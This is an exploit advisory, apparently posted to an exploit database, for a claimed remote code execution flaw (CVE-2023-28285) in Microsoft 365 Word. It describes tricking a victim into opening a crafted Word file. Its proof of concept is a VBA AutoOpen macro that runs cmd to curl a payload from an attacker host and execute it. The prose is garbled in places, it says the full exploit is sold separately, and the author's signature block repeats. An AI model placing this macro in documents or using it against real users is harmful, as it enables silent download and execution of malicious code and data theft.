Microsoft 365 MSO 2305 Build 16.0.16501.20074 Remote Code Execution

`## Title: Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074)  
64-bit Remote Code Execution Vulnerability  
## Author: nu11secur1ty  
## Date: 04.17.2023  
## Vendor: https://www.microsoft.com/  
## Software: https://www.microsoft.com/en-us/microsoft-365/  
## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/  
## CVE-2023-28285  
  
  
## Description:  
The attack itself is carried out locally by a user with authentication  
to the targeted system. An attacker could exploit the vulnerability by  
convincing a victim, through social engineering, to download and open  
a specially crafted file from a website which could lead to a local  
attack on the victim's computer. The attacker can trick the victim to  
open a malicious web page by using a malicious `Word` file for  
`Office-365 API`. After the user will open the file to read it, from  
the API of Office-365, without being asked what it wants to activate,  
etc, he will activate the code of the malicious server, which he will  
inject himself, from this malicious server. Emedietly after this  
click, the attacker can receive very sensitive information! For bank  
accounts, logs from some sniff attacks, tracking of all the traffic of  
the victim without stopping, and more malicious stuff, it depends on  
the scenario and etc.  
STATUS: HIGH Vulnerability  
  
[+]Exploit:  
The exploit server must be BROADCASTING at the moment when the victim  
hit the button of the exploit!  
  
[+]PoC:  
```cmd  
Sub AutoOpen()  
Call Shell("cmd.exe /S /c" & "curl -s  
http://attacker.com/CVE-2023-28285/PoC.debelui | debelui",  
vbNormalFocus)  
End Sub  
```  
  
## FYI:  
The PoC has a price and this report will be uploaded with a  
description and video of how you can reproduce it only.  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28285)  
  
## Proof and Exploit  
[href](https://www.nu11secur1ty.com/2023/04/cve-2023-28285-microsoft-office-remote.html)  
  
## Time spend:  
01:30:00  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and  
https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.html  
https://cxsecurity.com/ and https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>  
`